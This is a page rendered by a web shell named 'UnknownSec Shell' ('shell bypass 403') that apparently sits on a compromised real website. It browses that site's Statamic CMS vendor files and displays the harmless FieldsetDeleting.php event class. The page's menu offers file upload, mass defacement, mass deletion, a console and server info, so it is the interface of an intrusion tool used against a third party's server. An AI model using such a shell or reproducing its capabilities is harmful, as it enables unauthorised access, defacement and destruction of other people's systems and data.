shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Events
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
FieldsetDeleting.php
<?php namespace Statamic\Events; class FieldsetDeleting extends Event { public function __construct(public $fieldset) { } /** * Dispatch the event with the given arguments, and halt on first non-null listener response. * * @return mixed */ public static function dispatch() { return event(new static(...func_get_args()), [], true); } }
© 2026 UnknownSec